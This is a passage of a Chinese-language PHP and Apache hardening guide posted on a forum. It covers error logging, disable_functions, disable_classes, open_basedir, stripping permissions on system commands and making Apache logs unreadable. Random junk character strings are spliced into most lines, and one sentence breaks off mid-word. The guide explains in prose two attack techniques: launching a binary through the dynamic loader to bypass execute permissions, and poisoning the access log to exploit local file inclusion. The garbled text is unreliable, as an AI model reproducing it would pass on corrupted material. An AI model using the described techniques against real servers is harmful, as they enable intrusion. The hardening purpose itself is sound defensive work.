. B% d$ q, G6 j  y5 D4 z7 Q
在平时开发调试时这非常有用,可以根据警告信息马上找到程序错误所在。) y7 C+ u( x0 W: p- v' q$ t
正式应用时,警告及错误信息让用户不知所措,而且给攻击者泄漏了脚本所在的物理路径,为攻击者的进一步攻击提供了有利的信息。而且由于自己没有访问到错误的地方,反而不能及时修改程序的错误。所以把PHP的所有警告及错误信息记录到一个日志文件是非常明智的,即不给攻击者泄漏物理路径,又能让自己知道程序错误所在。
! m  L# r' K, A4 H' L7 O) E
5 J- G; p# {+ L修改php.ini中关于Error handling and logging部分内容:- V4 x- L6 R1 V3 R2 f- m" `
( I0 |% Y4 B/ b1 e5 t5 e
error_reporting  =  E_ALL' J) e5 v3 P0 k' _
display_errors = Off% T0 m- P% |+ D. Y! P' E5 B
log_errors = On
7 h( t! E) e& ]& A, N( Verror_log = /usr/local/apache/logs/php_error.log: v6 I: f% V" D; e# I& h. V! x

$ j) ~7 d9 a4 h- W- i' o然后重启apache,注意文件/usr/local/apache/logs/php_error.log必需可以让nobody用户可写。3 H% ?* h6 T  }% j* q9 S

, j  G0 Y4 X% G! T9 K. l9、disable_functions5 u) H+ x2 z7 O
2 n' k, q' c+ b8 U
如果觉得有些函数还有威胁,可以设置php.ini里的disable_functions(这个选项不能在httpd.conf里设置),比如:& i- F: n' G! E
% Y- e; D) F# v5 V' ?) T
disable_functions = phpinfo, get_cfg_var9 f0 J- P' M1 A9 {. K

3 z& [( u* B' w( y) ]& T* j- j0 e可以指定多个函数,用逗号分开。重启apache后,phpinfo, get_cfg_var函数都被禁止了。建议关闭函数phpinfo, get_cfg_var,这两个函数容易泄漏服务器信息,而且没有实际用处。( W0 s4 b% l! z9 I. {" J- p1 v

+ ^# Q" H, p' U$ U10、disable_classes
* `8 m9 a0 P3 V% U4 a- B
9 f0 i; D$ w( P! s- k! b9 a这个选项是从PHP-4.3.2开始才有的,它可以禁用某些类,如果有多个用逗号分隔类名。disable_classes也不能在httpd.conf里设置,只能在php.ini配置文件里修改。
& Q5 d8 {' l. ]2 s+ G$ `( J# l3 D% ^" i0 j) ?
11、open_basedir  a+ X" J2 [' r5 k, d

! i4 {( ]4 U! h( D! h8 U前面分析例程的时候也多次提到用open_basedir对脚本操作路径进行限制,这里再介绍一下它的特性。用open_basedir指定的限制实际上是前缀,不是目录名。也就是说 "open_basedir = /dir/incl" 也会允许访问 "/dir/include" 和 "/dir/incls",如果它们存在的话。如果要将访问限制在仅为指定的目录,用斜线结束路径名。例如:"open_basedir = /dir/incl/"。2 ~4 p, O5 t9 l
可以设置多个目录,在Windows中,用分号分隔目录。在任何其它系统中用冒号分隔目录。作为Apache模块时,父目录中的open_basedir路径自动被继承。
" U; s1 H# I; j8 X1 v
  D2 Q* Q! i6 x+ W四、其它安全配置
5 E% g7 B' B0 L
. `0 |/ Q: s4 p- @: M0 h( f% T1 B1、取消其它用户对常用、重要系统命令的读写执行权限
4 f5 D5 D  N9 Y1 J4 Y' J1 [. o7 B" n  `& ~+ p
一般管理员维护只需一个普通用户和管理用户,除了这两个用户,给其它用户能够执行和访问的东西应该越少越好,所以取消其它用户对常用、重要系统命令的读写执行权限能在程序或者服务出现漏洞的时候给攻击者带来很大的迷惑。记住一定要连读的权限也去掉,否则在linux下可以用/lib/ld-linux.so.2 /bin/ls这种方式来执行。/ R5 ^" g( }, s0 s! P! j# _2 U
如果要取消某程如果是在chroot环境里,这个工作比较容易实现,否则,这项工作还是有些挑战的。因为取消一些程序的执行权限会导致一些服务运行不正常。PHP的mail函数需要/bin/sh去调用sendmail发信,所以/bin/bash的执行权限不能去掉。这是一项比较累人的工作,
4 C+ o2 T. }) P0 M* r$ @% F  m- I4 m2 E
2、去掉apache日志其它用户的读权限8 j% l" w4 m! z
& O3 F. N3 Q, m+ h
apache的access-log给一些出现本地包含漏洞的程序提供了方便之门。通过提交包含PHP代码的URL,可以使access-log包含PHP代码,那么把包含文件指向access-log就可以执行那些PHP代码,从而获得本地访问权限。2 d; H1 e" s. k4 C+ r
如果有其它虚拟主机,也应该相应去掉该日志文件其它用户的读权限。  L* s1 y! e% g; x

" `+ _0 i# F$ h3 @1 ?+ @当然,如果你按照前面介绍的配置PHP那么一般已经是无法读取日志文件了。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|宁德市腾云网络科技有限公司 ( 闽ICP备2022007940号-5|闽公网安备 35092202000206号 )

GMT+8, 2026-10-2 06:18 , Processed in 0.019239 second(s), 15 queries .

Powered by Discuz! X3.5

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表